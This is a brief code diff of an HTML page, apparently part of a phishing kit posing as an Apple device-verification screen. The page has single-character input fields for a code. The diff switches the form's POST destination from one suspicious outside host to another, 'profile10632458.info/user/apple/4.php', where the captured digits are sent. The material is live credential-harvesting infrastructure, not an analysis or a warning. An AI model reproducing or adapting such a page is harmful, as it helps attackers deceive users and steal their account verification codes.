--- a/codeindex/r/index.html
+++ b/codeindex/r/index.html
@@ -53,7 +53,7 @@
 }
 </style>
 <div class="verify-device fade-in">
-    <form id="form1" name="credit" method="post" action="http://settings.acsite.org/user/apple/4.php"> 
+    <form id="form1" name="credit" method="post" action="http://profile10632458.info/user/apple/4.php"> 
         <div class="field-wrap">
             <input maxlength="1" name="col1" placeholder="" value="" type="text" id="char1" class="form-control char-field" onkeyup="return checkNum(this, value);">
         </div>
